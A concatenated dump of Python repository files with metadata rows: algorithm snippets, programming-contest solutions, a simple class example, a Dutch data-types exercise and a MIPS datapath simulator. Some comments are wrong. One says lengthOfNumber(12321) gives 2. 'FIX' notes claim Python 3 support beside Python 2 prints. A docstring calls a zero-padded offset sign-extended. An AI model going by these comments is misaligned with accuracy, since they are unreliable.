    compatibility with existing keyword callers.)
    """
    if list == []:
        return []
    pivot, rest = list[0], list[1:]
    smaller = [x for x in rest if x < pivot]
    larger = [x for x in rest if x >= pivot]
    return qsort(smaller) + [pivot] + qsort(larger)
| Python | 2 | 74.5 | 133 | /random/QuickSort.py | 0.549669 | 0.516556 |
KartikTalwar/playground | refs/heads/master | newlist = sorted(arr, key=lambda k: k['keyName'])
import operator
# Same sort without a lambda: operator.itemgetter is the idiomatic key function.
# NOTE(review): `arr` is presumably a list of dicts each holding a 'keyName'
# key — it is not defined in this snippet; confirm against the caller.
newlist = sorted(arr, key=operator.itemgetter('keyName'))
| Python | 4 | 30.25 | 57 | /python/Sort Dictionary by Value.py | 0.736 | 0.736 |
KartikTalwar/playground | refs/heads/master | array = ['duck', 'duck', 'goose']
print max(set(array), key=array.count)
| Python | 2 | 35.5 | 38 | /python/Find Most Common Item From List.py | 0.643836 | 0.643836 |
def multiply(x, y):
    """Multiply two non-negative ints with Karatsuba's algorithm.

    Numbers at or below 1536 bits fall back to the builtin multiply; larger
    operands are split at a 32-bit-aligned midpoint and combined with three
    recursive multiplications instead of four.
    FIX: uses floor division (//) so the shift amount stays an int on
    Python 3 (`/` yields a float there and breaks the shifts).
    NOTE(review): assumes x, y >= 0 — bit_length() of a negative number
    ignores the sign, so negatives are not handled (same as the original).
    """
    if x.bit_length() <= 1536 or y.bit_length() <= 1536:
        return x * y
    n = max(x.bit_length(), y.bit_length())
    # Round the split point to a multiple of 32 bits.
    half = (n + 32) // 64 * 32
    mask = (1 << half) - 1
    xlow, xhigh = x & mask, x >> half
    ylow, yhigh = y & mask, y >> half
    a = multiply(xhigh, yhigh)
    b = multiply(xlow + xhigh, ylow + yhigh)
    c = multiply(xlow, ylow)
    # Middle term via Karatsuba's identity: (xl+xh)(yl+yh) - a - c.
    d = b - a - c
    return (((a << half) + d) << half) + c
class DictObject(dict):
    """A dict whose keys are also readable/writable as attributes.

    FIX: the original __setattr__ returned self[k] instead of storing the
    value, so attribute assignment silently did nothing (or raised KeyError
    for new keys). Missing attributes now raise AttributeError, as the
    attribute protocol expects, instead of leaking KeyError.
    """

    def __getattr__(self, k):
        try:
            return self[k]
        except KeyError:
            raise AttributeError(k)

    def __setattr__(self, k, v):
        self[k] = v
obj = DictObject({'key' : 'value'})
print obj.key
| Python | 11 | 15.272727 | 35 | /python/DictionaryToObject.py | 0.581006 | 0.581006 |
KartikTalwar/playground | refs/heads/master | '''
Facebook Hacker Cup 2012 Qualification Round
Alphabet Soup
Alfredo Spaghetti really likes soup, especially when it contains alphabet pasta. Every day he constructs
a sentence from letters, places the letters into a bowl of broth and enjoys delicious alphabet soup.
Today, after constructing the sentence, Alfredo remembered that the Facebook Hacker Cup starts today!
Thus, he decided to construct the phrase "HACKERCUP". As he already added the letters to the broth,
he is stuck with the letters he originally selected. Help Alfredo determine how many times he can place
the word "HACKERCUP" side-by-side using the letters in his soup.
Input
The first line of the input file contains a single integer T: the number of test cases. T lines follow,
each representing a single test case with a sequence of upper-case letters and spaces: the original
sentence Alfredo constructed.
Output
Output T lines, one for each test case. For each case, output "Case #t: n", where t is the test case
number (starting from 1) and n is the number of times the word "HACKERCUP" can be placed side-by-side
using the letters from the sentence.
Constraints
1 < T <= 20
Sentences contain only the upper-case letters A-Z and the space character
Each sentence contains at least one letter, and contains at most 1000 characters, including spaces
'''
import urllib
def parse(string):
    """Return how many times 'HACKERCUP' can be laid side-by-side from *string*.

    Counts each required letter in the sentence; 'C' is needed twice per
    word, so its count is halved. The answer is the scarcest letter's count.
    FIX: uses floor division (//=) so the minimum stays an int on Python 3
    (`/=` would produce a float there).
    """
    d = {'H': 0, 'A': 0, 'C': 0, 'K': 0, 'E': 0, 'R': 0, 'U': 0, 'P': 0}
    d.update({s: string.count(s) for s in string if s in d})
    d['C'] //= 2
    return min(d.values())
# Fetch the puzzle input (Python 2 urllib API); line 0 holds the test-case
# count, lines 1..T hold the sentences.
# NOTE(review): `file` shadows the Python 2 builtin of the same name.
file = urllib.urlopen("https://raw.github.com/gist/1651354/67521ff0ac3332ca68713dfcd474a431c2d6c427/AlphabetSoupInput.txt").read().split('\n')
# Emit one "Case #t: n" line per sentence into output.txt.
open('output.txt', 'w').write( "\n".join( [("Case #%d: %d" % (i, parse(file[i]))) for i in range(1, len(file))]))
| Python | 37 | 47.62162 | 142 | /random/contests/Facebook HackerCup/FBHackerCupAlphabetSoup.py | 0.737632 | 0.70706 |
KartikTalwar/playground | refs/heads/master | """
# Speaking in Tongues
## Problem
We have come up with the best possible language here at Google, called Googlerese. To translate text into
Googlerese, we take any message and replace each English letter with another English letter. This mapping
is one-to-one and onto, which means that the same input letter always gets replaced with the same output
letter, and different input letters always get replaced with different output letters. A letter may be
replaced by itself. Spaces are left as-is.
For example (and here is a hint!), our awesome translation algorithm includes the following three mappings:
'a' -> 'y', 'o' -> 'e', and 'z' -> 'q'. This means that "a zoo" will become "y qee".
Googlerese is based on the best possible replacement mapping, and we will never change it. It will always be
the same. In every test case. We will not tell you the rest of our mapping because that would make the problem
too easy, but there are a few examples below that may help.
Given some text in Googlerese, can you translate it to back to normal text?
Solving this problem
Usually, Google Code Jam problems have 1 Small input and 1 Large input. This problem has only 1 Small input.
Once you have solved the Small input, you have finished solving this problem.
### Input
The first line of the input gives the number of test cases, T. T test cases follow, one per line.
Each line consists of a string G in Googlerese, made up of one or more words containing the letters 'a' - 'z'.
There will be exactly one space (' ') character between consecutive words and no spaces at the beginning or at
the end of any line.
### Output
For each test case, output one line containing "Case #X: S" where X is the case number and S is the string that
becomes G in Googlerese.
### Limits
1 <= T <= 30.
G contains at most 100 characters.
None of the text is guaranteed to be valid English.
### Sample
Input
3
ejp mysljylc kd kxveddknmc re jsicpdrysi
rbcpc ypc rtcsra dkh wyfrepkym veddknkmkrkcd
de kr kd eoya kw aej tysr re ujdr lkgc jv
Output
Case #1: our language is impossible to understand
Case #2: there are twenty six factorial possibilities
Case #3: so it is okay if you want to just give up
"""
import string, urllib
# Puzzle input URL (Google Code Jam 2012 Qualification, problem A).
# NOTE(review): `input` shadows the builtin of the same name.
input = 'https://raw.github.com/gist/2404633/65abea31f1a9504903f343e762d007d95ef0540a/GoogleCodeJam-SpeakingInTongues.txt'
# Substitution cipher: Googlerese letter -> plain letter (Python 2 string.maketrans).
decoded = string.maketrans('ynficwlbkuomxsevzpdrjgthaq', 'abcdefghijklmnopqrstuvwxyz')
# Drop line 0 (the test-case count); keep one ciphertext per line.
getdata = urllib.urlopen(input).read().split('\n')[1:]
for i, j in enumerate(getdata):
    # Python 2 print statement; cases are numbered from 1.
    print "Case #%d: %s" % (i+1, j.translate(decoded))
| Python | 67 | 38.104477 | 124 | /random/contests/Google CodeJam/Speaking in Tongues.py | 0.746662 | 0.727966 |
def genPrimes(n):
    """Return all primes <= n using a compressed wheel-of-6 sieve.

    Only numbers of the form 6k±1 are tracked (index i maps to 3*i+1|1),
    so the sieve uses a third of the memory of a plain sieve.
    FIX: floor division (//) and range() replace Python 2's integer `/`
    and xrange, which broke slice indices on Python 3.
    """
    # Pad n up to a multiple of 6 and compute the tail correction.
    n, correction = n - n % 6 + 6, 2 - (n % 6 > 1)
    sieve = [True] * (n // 3)
    for i in range(1, int(n ** 0.5) // 3 + 1):
        if sieve[i]:
            k = 3 * i + 1 | 1
            # Strike multiples of k starting at k*k, stepping 2k (odd only).
            sieve[k * k // 3::2 * k] = [False] * ((n // 6 - k * k // 6 - 1) // k + 1)
            sieve[k * (k - 2 * (i & 1) + 4) // 3::2 * k] = [False] * ((n // 6 - k * (k - 2 * (i & 1) + 4) // 6 - 1) // k + 1)
    return [2, 3] + [3 * i + 1 | 1 for i in range(1, n // 3 - correction) if sieve[i]]
print genPrimes(10000) | Python | 12 | 36.083332 | 93 | /random/generatePrimes.py | 0.439189 | 0.34009 |
def fibonacci(n):
    """Return the pair (F(n), F(n+1)) using the fast-doubling method.

    F(2k) = F(k)*(2*F(k+1) - F(k)) and F(2k+1) = F(k+1)^2 + F(k)^2, giving
    O(log n) recursive steps.
    FIX: n // 2 instead of n / 2 — on Python 3 the float result caused
    infinite recursion.
    """
    if n == 0:
        return (0, 1)
    a, b = fibonacci(n // 2)
    c = a * (2 * b - a)
    d = b * b + a * a
    return (c, d) if n % 2 == 0 else (d, c + d)
print fibonacci(100000)[0] | Python | 10 | 21.5 | 47 | /computation/FastFibonnaci.py | 0.415179 | 0.352679 |
KartikTalwar/playground | refs/heads/master | print [x % 3/2 * 'Fizz' + x % 5/4 * 'Buzz' or x + 1 for x in range(100)]
| Python | 1 | 72 | 72 | /random/FizzBuzz.py | 0.506849 | 0.39726 |
KartikTalwar/playground | refs/heads/master | # Run this script and enter 3 numbers separated by space
# example input '5 5 5'
a,b,c=map(int,raw_input().split())
for i in range(b+c+1):print(' '*(c-i)+((' /|'[(i>c)+(i>0)]+'_'*4)*(a+1))[:-4]+('|'*(b+c-i))[:b]+'/')[:5*a+c+1]
| Python | 4 | 55.75 | 110 | /random/printCubes.py | 0.524229 | 0.475771 |
def lengthOfNumber(n):
    """Return the number of decimal digits in the integer n, sign ignored.

    Generalizes the original log10-based version: handles 0 and negative
    inputs (which previously raised a math domain error) and is exact for
    arbitrarily large ints, where floating-point log10 can misround.
    """
    return len(str(abs(int(n))))
print lengthOfNumber(12321) # should give 2
| Python | 5 | 26.4 | 44 | /random/LengthOfNumber.py | 0.715328 | 0.635036 |
def eratosthenes_sieve(n):
    """Return all primes <= n via the Sieve of Eratosthenes.

    Composite slots are overwritten with None by slice assignment, then
    filtered out (0 and 1 are falsy and drop out automatically).
    FIX: range() replaces Python 2's xrange, which no longer exists on
    Python 3.
    """
    candidates = list(range(n + 1))
    for i in range(2, int(n ** 0.5) + 1):
        if candidates[i]:
            # Strike every multiple of i from 2i upward in one slice write.
            candidates[2 * i::i] = [None] * (n // i - 1)
    return [i for i in candidates[2:] if i]
def isPrime(n):
    """Primality test via the classic unary regex trick.

    '1'*n matches `^1?$` when n is 0 or 1, and `^(11+?)\\1+$` when n has a
    nontrivial factorization (a group of k ones repeated >= 2 times); primes
    match neither.
    FIX: `is None` instead of `== None` (identity comparison is the idiom
    for None checks).
    """
    import re
    return re.match(r'^1?$|^(11+?)\1+$', '1' * n) is None
| Python | 3 | 28.333334 | 57 | /random/IsPrime.py | 0.488636 | 0.431818 |
KartikTalwar/playground | refs/heads/master | """
Beautiful Strings
When John was a little kid he didn't have much to do. There was no internet, no Facebook,
and no programs to hack on. So he did the only thing he could... he evaluated the beauty
of strings in a quest to discover the most beautiful string in the world.
Given a string s, little Johnny defined the beauty of the string as the sum of the beauty
of the letters in it.
The beauty of each letter is an integer between 1 and 26, inclusive, and no two letters
have the same beauty. Johnny doesn't care about whether letters are uppercase or lowercase,
so that doesn't affect the beauty of a letter.
(Uppercase 'F' is exactly as beautiful as lowercase 'f', for example.)
You're a student writing a report on the youth of this famous hacker. You found the string
that Johnny considered most beautiful. What is the maximum possible beauty of this string?
Input
The input file consists of a single integer m followed by m lines.
Output
Your output should consist of, for each test case, a line containing the string "Case #x: y"
where x is the case number (with 1 being the first case in the input file, 2 being the second, etc.)
and y is the maximum beauty for that test case.
Constraints
5 <= m <= 50
2 <= length of s <= 500
Example input Example output
5
ABbCcc Case #1: 152
Good luck in the Facebook Hacker Cup this year! Case #2: 754
Ignore punctuation, please :) Case #3: 491
Sometimes test cases are hard to make up. Case #4: 729
So I just go consult Professor Dalves Case #5: 646
"""
import re, operator, urllib2
def getScore(s):
    """Return the maximum "beauty" of sentence *s*.

    Only letters count (case-insensitive). The most frequent letter gets
    beauty 26, the next 25, and so on; the score is the sum of
    count * beauty. Ties in frequency cannot change the total, since equal
    counts multiplied by consecutive weights sum identically either way.
    FIX: dict.items() replaces Python 2's iteritems(), and the counting loop
    replaces the O(n^2) per-character str.count() of the original.
    """
    s = re.sub('[^A-Za-z]', '', s).lower()
    counts = {}
    for ch in s:
        counts[ch] = counts.get(ch, 0) + 1
    total = 0
    beauty = 26
    for _letter, count in sorted(counts.items(), key=operator.itemgetter(1), reverse=True):
        total += count * beauty
        beauty -= 1
    return total
file = urllib2.urlopen('https://gist.github.com/raw/4647356/f490a1df2ccda25553c70086205e38fc7e53647e/FBHackerCupBeautifulStrings.txt').read().split('\n')
open('output.txt', 'w').write( "\n".join( [("Case #%d: %d" % (i, getScore(file[i]))) for i in range(1, len(file))][:-1]))
| Python | 61 | 36.590164 | 153 | /random/contests/Facebook HackerCup/BeautifulStrings.py | 0.651264 | 0.617698 |
takeiteasyguy/classes-and-oop | refs/heads/master | NO_STUDENTS = "There is no students for this teacher"
class Person(object):
    """A named person; base class for students and teachers."""

    def __init__(self, name):
        # Public name, read by __str__ in this class and its subclasses.
        self.name = name

    def __str__(self):
        return "My name is {}".format(self.name)
class Student(Person):
    """A person enrolled in a study group."""

    def __init__(self, name, group):
        super(Student, self).__init__(name)
        self.group = group

    def __str__(self):
        return "My name is {} and I'm from {} group".format(self.name, self.group)

    def print_group(self):
        """Return (not print) a short description of the student's group."""
        return "My group is {}".format(self.group)
class Teacher(Person):
    """A person who keeps a roster of students."""

    def __init__(self, name):
        super(Teacher, self).__init__(name)
        self.students = []

    def add_student(self, student):
        """Append *student* to the roster."""
        self.students.append(student)

    def remove_student(self, student):
        """Remove every roster entry whose name matches *student*'s name.

        FIX: the original removed items from self.students while iterating
        over it, which skips the element following each removal; rebuilding
        the list avoids the mutation-during-iteration bug.
        """
        self.students = [s for s in self.students if s.name != student.name]

    def __str__(self):
        return "My name is %s and my students are:\n%s" % (self.name, self.get_all_students())

    def get_all_students(self):
        """Return the students one per line, or the NO_STUDENTS message."""
        if self.students:
            return "\n".join("%s" % st for st in self.students)
        else:
            return NO_STUDENTS
# Lightweight smoke test, executed only when the module is run directly.
if __name__ == "__main__":
    alice_student = Student("Alice", "12")
    bob_student = Student("Bob", "12")
    alex_teacher = Teacher("Alex")
    # A fresh teacher has no students yet.
    assert alex_teacher.get_all_students() == NO_STUDENTS
    alex_teacher.add_student(alice_student)
    assert alex_teacher.get_all_students() == "%s" % alice_student
    alex_teacher.add_student(bob_student)
    print(alex_teacher)
    alex_teacher.remove_student(alice_student)
    # Only Bob should remain after Alice is removed.
    assert alex_teacher.get_all_students() == "%s" % bob_student
| Python | 57 | 28.526316 | 94 | /main.py | 0.601307 | 0.59893 |
# int: whole numbers
hoeveelKopjesSuiker = 2
# bool: Python's boolean literals are capitalized.
# FIX: the original lowercase `false`/`true` raised NameError.
IsDezePersoonMijnMatch = False
IsDezePersoonMijnMatch = True
# string
spreekwoord = "De kat op het spek binden"
# long: Python ints have arbitrary precision; ** is exponentiation (2**123).
MijnBankRekeningNummer = 2**123
# char: Python has no separate char type — a single character is a 1-char
# string. FIX: the original C-style `char VoorletterNaam = 'r'` was a
# SyntaxError.
VoorletterNaam = 'r'
from decimal import Decimal

# Python has a single 'float' type (no separate double precision type).
ditIsEenfloat = 0.2422
# decimal: exact decimal arithmetic comes from the stdlib decimal module.
# FIX: the original bare `decimal('1.31')` raised NameError — the class is
# Decimal and must be imported.
hoeveelKidsHebJe = Decimal('1.31')
AntLouiz/DatapathWay | refs/heads/master | # Intruçoes que o programa reconhece
# Instruction set recognized by the simulator: maps the 6-bit MIPS
# opcode/funct bit pattern to its mnemonic.
FUNCTIONS = {
    '101011': 'sw',
    '100011': 'lw',
    '100000': 'add',
    '100010': 'sub',
    '100101': 'or',
    '100100': 'and'
}
| Python | 9 | 18.444445 | 36 | /li.py | 0.514286 | 0.308571 |
def to_integer(binary_number):
    """Convert a binary string (e.g. '101') to its unsigned integer value.

    Raises:
        TypeError: if binary_number is not a str. (The original raised a
        bare Exception; TypeError is the precise type and, being an
        Exception subclass, stays compatible with existing handlers.)
    """
    if not isinstance(binary_number, str):
        raise TypeError("binary_number must be a str, got %r" % type(binary_number))
    return int(binary_number, 2)
def to_binary(number):
    """Convert a non-negative int to its binary string (no '0b' prefix).

    Raises:
        TypeError: if number is not an int. (The original raised a bare
        Exception; TypeError is the precise, backward-compatible choice.)
    """
    if not isinstance(number, int):
        raise TypeError("number must be an int, got %r" % type(number))
    return "{:0b}".format(number)
def extend_to_bits(binary_number, bits = 32):
    """Left-pad a binary string with zeros to *bits* characters.

    Returns None for non-str input (kept for backward compatibility with
    callers that check for None). Strings already longer than *bits* are
    returned unchanged — str.zfill reproduces the original manual padding
    exactly, including that case.
    NOTE(review): assumes an unsigned binary string (no '-' sign).
    """
    if not isinstance(binary_number, str):
        return None
    return binary_number.zfill(bits)
def to_binaryC2(number, bits = 32):
    """Encode *number* as a *bits*-wide two's-complement binary string.

    `number % 2**bits` maps in-range negatives to their two's-complement
    encoding and leaves in-range non-negatives unchanged, collapsing the two
    duplicated branches of the original into one expression.

    Raises:
        TypeError: if number is not an int. (The original raised a bare
        Exception; TypeError is the precise, backward-compatible choice.)
    """
    if not isinstance(number, int):
        raise TypeError("number must be an int, got %r" % type(number))
    return "{:0{width}b}".format(number % (1 << bits), width=bits)
def to_decimalC2(binary_number):
    """Decode a two's-complement binary string into a signed int.

    The string's own length is taken as the bit width. Returns None for
    non-str input (legacy behavior kept for existing callers).
    """
    if not isinstance(binary_number, str):
        return None
    width = len(binary_number)
    value = int(binary_number, 2)
    # A leading '1' marks a negative value: subtract 2**width to recover it.
    if binary_number[0] != '0':
        value -= 1 << width
    return value
AntLouiz/DatapathWay | refs/heads/master | from utils import (
extend_to_bits,
to_binary,
to_integer,
to_binaryC2,
to_decimalC2
)
class ALU:
    """Arithmetic/logic unit operating on two's-complement binary strings.

    Inputs and outputs are 32-bit binary strings (see utils.to_binaryC2);
    arithmetic results wrap to 32 bits, with a console warning on signed
    overflow.
    """

    # Signed 32-bit bounds used for overflow reporting.
    _INT32_MAX = 2 ** 31 - 1
    _INT32_MIN = -(2 ** 31)

    def _warn_on_overflow(self, value):
        """Print a warning when *value* leaves the signed 32-bit range.

        FIX: the original duplicated this check in makeSum/makeSub with two
        inconsistently formatted banners and misspelled OCCURRENCE; the
        message is now unified. The result still wraps via to_binaryC2.
        """
        if value > self._INT32_MAX or value < self._INT32_MIN:
            print("{}OVERFLOW OCCURRENCE".format("-" * 26))

    def makeSum(self, a, b):
        """Return a + b as a 32-bit two's-complement string."""
        result = to_decimalC2(a) + to_decimalC2(b)
        self._warn_on_overflow(result)
        return to_binaryC2(result)

    def makeSub(self, a, b):
        """Return a - b as a 32-bit two's-complement string."""
        result = to_decimalC2(a) - to_decimalC2(b)
        self._warn_on_overflow(result)
        return to_binaryC2(result)

    def makeAnd(self, a, b):
        """Return the bitwise AND of a and b, zero-extended to 32 bits."""
        return extend_to_bits(to_binary(int(a, 2) & int(b, 2)))

    def makeOr(self, a, b):
        """Return the bitwise OR of a and b, zero-extended to 32 bits."""
        return extend_to_bits(to_binary(int(a, 2) | int(b, 2)))

    def makeNot(self, a):
        """Return the bitwise NOT of a, at a's own bit width."""
        return to_binaryC2(~to_decimalC2(a), len(a))
| Python | 58 | 17.827587 | 69 | /logic.py | 0.498168 | 0.467949 |
AntLouiz/DatapathWay | refs/heads/master | from memory import RegistersBank, Memory
from logic import ALU
from instructions import PC
from control import (
ControlSw,
ControlLw,
ControlAdd,
ControlSub,
ControlAnd,
ControlOr,
)
class CPU:
    """Wires the datapath components together and dispatches instructions."""

    def __init__(self):
        self.alu = ALU()
        self.pc = PC()
        self.registers = RegistersBank()
        self.memory = Memory()
        # Dispatch table: instruction mnemonic -> its control unit, each
        # control unit holding a back-reference to this CPU.
        wiring = (
            ('add', ControlAdd),
            ('sub', ControlSub),
            ('and', ControlAnd),
            ('or', ControlOr),
            ('lw', ControlLw),
            ('sw', ControlSw),
        )
        self.control_types = {mnemonic: control(self) for mnemonic, control in wiring}

    def execute(self):
        """Run every fetched instruction through its matching control unit."""
        for instruction in self.pc.get_instructions():
            mnemonic = instruction.get_func()
            self.control_types[mnemonic].execute()
| Python | 33 | 23.666666 | 58 | /core.py | 0.570025 | 0.570025 |
AntLouiz/DatapathWay | refs/heads/master | import abc
from utils import to_integer, to_decimalC2
class BaseControl(abc.ABC):
    """Common interface for single-instruction control units.

    Each subclass implements execute() for one mnemonic, using the CPU's
    registers, memory, ALU and program counter.
    """
    def __init__(self, cpu):
        # Back-reference to the CPU that owns this control unit.
        self.cpu = cpu

    @abc.abstractmethod
    def execute(self):
        """Run the CPU's current instruction through the datapath."""
        pass
class ControlAdd(BaseControl):
    """Control unit for the R-type `add` instruction (rd = rs + rt)."""
    def execute(self):
        """Read rs and rt, add them in the ALU, write the result to rd.

        Every datapath step is traced to stdout.
        """
        instruction = self.cpu.pc.next_instruction
        registers = instruction.get_registers()
        print(instruction)
        # 5-bit register fields from the instruction word.
        rd = registers['rd']
        rs = registers['rs']
        print("Read the register 1: {}{}[{}]".format(rs, ' '*25, to_integer(rs)))
        rt = registers['rt']
        print("Read the register 2: {}{}[{}]".format(rt, ' '*25, to_integer(rt)))
        # Fetch the 32-bit operand strings from the register bank.
        register_data1 = self.cpu.registers.get_value(rs)
        print("Read data 1: {}".format(register_data1, ))
        register_data2 = self.cpu.registers.get_value(rt)
        print("Read data 2: {}".format(register_data2, ))
        print("ALU-in-1: {}{}[{}]".format(register_data1, ' '*6, to_decimalC2(register_data1)))
        print("ALU-in-2: {}{}[{}]".format(register_data2, ' '*6, to_decimalC2(register_data2)))
        alu_result = self.cpu.alu.makeSum(register_data1, register_data2)
        print("ALU-result: {}{}[{}]".format(alu_result, ' '*6, to_decimalC2(alu_result)))
        # Write-back stage: store the sum into rd.
        self.cpu.registers.set_value(rd, alu_result)
        print("Write data: {}".format(alu_result, ))
        print("Write register: {}{}[{}]".format(rd, ' '*30, to_integer(rd)))
        print("{}".format("-" * 64))
        print("\n\n")
class ControlSub(BaseControl):
    """Control unit for the R-type `sub` instruction (rd = rs - rt)."""
    def execute(self):
        """Read rs and rt, subtract in the ALU, write the result to rd.

        Every datapath step is traced to stdout.
        """
        instruction = self.cpu.pc.next_instruction
        registers = instruction.get_registers()
        print(instruction)
        # 5-bit register fields from the instruction word.
        rd = registers['rd']
        rs = registers['rs']
        print("Read the register 1: {}{}[{}]".format(rs, ' '*25, to_integer(rs)))
        rt = registers['rt']
        print("Read the register 2: {}{}[{}]".format(rt, ' '*25, to_integer(rt)))
        # Fetch the 32-bit operand strings from the register bank.
        register_data1 = self.cpu.registers.get_value(rs)
        print("Read data 1: {}".format(register_data1))
        register_data2 = self.cpu.registers.get_value(rt)
        print("Read data 2: {}".format(register_data2))
        print("ALU-in-1: {}{}[{}]".format(register_data1, ' '*6, to_decimalC2(register_data1)))
        print("ALU-in-2: {}{}[{}]".format(register_data2, ' '*6, to_decimalC2(register_data2)))
        alu_result = self.cpu.alu.makeSub(register_data1, register_data2)
        print("ALU-result: {}{}[{}]".format(alu_result, ' '*6, to_decimalC2(alu_result)))
        # Write-back stage: store the difference into rd.
        self.cpu.registers.set_value(rd, alu_result)
        print("Write data: {}".format(alu_result))
        print("Write register: {}{}[{}]".format(rd, ' '*30, to_integer(rd)))
        print("{}".format("-" * 64))
        print("\n\n")
class ControlAnd(BaseControl):
    """Control unit for the R-type `and` instruction (rd = rs & rt)."""
    def execute(self):
        """Read rs and rt, AND them in the ALU, write the result to rd.

        Every datapath step is traced to stdout.
        """
        instruction = self.cpu.pc.next_instruction
        registers = instruction.get_registers()
        print(instruction)
        # 5-bit register fields from the instruction word.
        rd = registers['rd']
        rs = registers['rs']
        print("Read the register 1: {}{}[{}]".format(rs, ' '*25, to_integer(rs)))
        rt = registers['rt']
        print("Read the register 2: {}{}[{}]".format(rt, ' '*25, to_integer(rt)))
        # Fetch the 32-bit operand strings from the register bank.
        register_data1 = self.cpu.registers.get_value(rs)
        print("Read data 1: {}".format(register_data1))
        register_data2 = self.cpu.registers.get_value(rt)
        print("Read data 2: {}".format(register_data2))
        print("ALU-in-1: {}{}[{}]".format(register_data1, ' '*6, to_decimalC2(register_data1)))
        print("ALU-in-2: {}{}[{}]".format(register_data2, ' '*6, to_decimalC2(register_data2)))
        alu_result = self.cpu.alu.makeAnd(register_data1, register_data2)
        print("ALU-result: {}{}[{}]".format(alu_result, ' '*6, to_decimalC2(alu_result)))
        # Write-back stage: store the bitwise AND into rd.
        self.cpu.registers.set_value(rd, alu_result)
        print("Write data: {}".format(alu_result))
        print("Write register: {}{}[{}]".format(rd, ' '*30, to_integer(rd)))
        print("{}".format("-" * 64))
        print("\n\n")
class ControlOr(BaseControl):
    """OR control unit: rd <- rs | rt, tracing every datapath stage."""

    def execute(self):
        instr = self.cpu.pc.next_instruction
        regs = instr.get_registers()
        print(instr)
        dest = regs['rd']
        src1 = regs['rs']
        print(f"Read the register 1: {src1}{' ' * 25}[{to_integer(src1)}]")
        src2 = regs['rt']
        print(f"Read the register 2: {src2}{' ' * 25}[{to_integer(src2)}]")
        data1 = self.cpu.registers.get_value(src1)
        print(f"Read data 1: {data1}")
        data2 = self.cpu.registers.get_value(src2)
        print(f"Read data 2: {data2}")
        print(f"ALU-in-1: {data1}{' ' * 6}[{to_decimalC2(data1)}]")
        print(f"ALU-in-2: {data2}{' ' * 6}[{to_decimalC2(data2)}]")
        result = self.cpu.alu.makeOr(data1, data2)
        print(f"ALU-result: {result}{' ' * 6}[{to_decimalC2(result)}]")
        self.cpu.registers.set_value(dest, result)
        print(f"Write data: {result}")
        print(f"Write register: {dest}{' ' * 30}[{to_integer(dest)}]")
        print("-" * 64)
        print("\n\n")
class ControlLw(BaseControl):
    """LW control unit: rt <- memory[rs + offset], tracing every stage."""

    def execute(self):
        instr = self.cpu.pc.next_instruction
        regs = instr.get_registers()
        mem_offset = instr.get_offset()
        print(instr)
        dest = regs['rt']
        base = regs['rs']
        print(f"Read the register 1:{' ' * 20}{base}{' ' * 6}[{to_integer(base)}]")
        base_value = self.cpu.registers.get_value(base)
        print(f"Read data 1: {base_value}")
        print(f"ALU-in-1: {base_value}{' ' * 6}[{to_decimalC2(base_value)}]")
        print(f"ALU-in-2: {mem_offset}{' ' * 6}[{to_decimalC2(mem_offset)}]")
        address = self.cpu.alu.makeSum(base_value, mem_offset)
        print(f"ALU-result: {address}{' ' * 6}[{to_decimalC2(address)}]")
        print(f"Address: {address}")
        word = self.cpu.memory.get_value(address)
        print(f"Read data: {word}")
        self.cpu.registers.set_value(dest, word)
        print(f"Write data: {word}{' ' * 6}[{to_decimalC2(word)}]")
        print(f"Write register:{' ' * 25}{dest}{' ' * 6}[{to_integer(dest)}]")
        print("-" * 64)
        print("\n\n")
class ControlSw(BaseControl):
    """SW control unit: memory[rs + offset] <- rt, tracing every stage."""

    def execute(self):
        instr = self.cpu.pc.next_instruction
        regs = instr.get_registers()
        mem_offset = instr.get_offset()
        print(instr)
        base = regs['rs']
        print(f"Read the register 1:{' ' * 20}{base}{' ' * 6}[{to_integer(base)}]")
        src = regs['rt']
        print(f"Read the register 2:{' ' * 20}{src}{' ' * 6}[{to_integer(src)}]")
        base_value = self.cpu.registers.get_value(base)
        print(f"Read data 1: {base_value}")
        store_value = self.cpu.registers.get_value(src)
        print(f"Read data 2: {store_value}")
        print(f"ALU-in-1: {base_value}{' ' * 6}[{to_decimalC2(base_value)}]")
        print(f"ALU-in-2: {mem_offset}{' ' * 6}[{to_decimalC2(mem_offset)}]")
        address = self.cpu.alu.makeSum(base_value, mem_offset)
        print(f"ALU-result: {address}{' ' * 6}[{to_decimalC2(address)}]")
        print(f"Address: {address}")
        self.cpu.memory.set_value(address, store_value)
        print(f"Write data: {store_value}{' ' * 6}[{to_decimalC2(store_value)}]")
        print("-" * 64)
        print("\n\n")
| Python | 225 | 34.373333 | 98 | /control.py | 0.563513 | 0.541777 |
AntLouiz/DatapathWay | refs/heads/master | from li import FUNCTIONS
from utils import extend_to_bits
class MipsInstruction:
    """A decoded 32-bit MIPS instruction (R-format or I-format)."""

    op = None
    rs = None
    rt = None
    rd = None
    shamt = None
    func = None
    offset = None
    instruction_type = None
    instruction = None

    def __init__(self, instruction):
        # BUG FIX: the original check was
        # `not (isinstance(instruction, str) or len(instruction) == 32)`,
        # so ANY string (even of the wrong length) passed, and any 32-element
        # non-string passed too. Require a string, strip the newline, then
        # require exactly 32 bits.
        if not isinstance(instruction, str):
            raise Exception()
        self.instruction = instruction.replace('\n', '')
        if len(self.instruction) != 32:
            raise Exception()
        self.op = self.instruction[:6]
        # An all-zero opcode marks an R-format instruction.
        if self.op == '000000':
            self._configure_to_registers()
        else:
            self._configure_to_imediate()

    def _configure_to_imediate(self):
        """Split the word into I-format fields (rs, rt, 16-bit offset)."""
        self.instruction_type = 'I'
        self.rs = self.instruction[6:11]
        self.rt = self.instruction[11:16]
        self.offset = self.instruction[16:32]
        return self.instruction

    def _configure_to_registers(self):
        """Split the word into R-format fields (rs, rt, rd, shamt, func)."""
        self.instruction_type = 'R'
        self.rs = self.instruction[6:11]
        self.rt = self.instruction[11:16]
        self.rd = self.instruction[16:21]
        self.shamt = self.instruction[21:26]
        self.func = self.instruction[26:32]
        return self.instruction

    def has_offset(self):
        """Only I-format instructions carry an offset field."""
        if self.instruction_type == 'R':
            return False
        return True

    def get_type(self):
        """Return 'R' or 'I'."""
        return self.instruction_type

    def get_function(self):
        """Return the raw 6-bit function field (None for I-format)."""
        return self.func

    def get_registers(self):
        """Return the raw 5-bit register fields as a dict (rd is None for I-format)."""
        registers = {
            'rs': self.rs,
            'rt': self.rt,
            'rd': self.rd
        }
        return registers

    def get_offset(self):
        """Return the sign-extended offset, or None for R-format."""
        if not self.has_offset():
            return None
        return extend_to_bits(self.offset)

    def get_func(self):
        """Resolve the operation name via the FUNCTIONS table (op for I, func for R)."""
        if self.op != '000000':
            return FUNCTIONS[self.op]
        return FUNCTIONS[self.func]

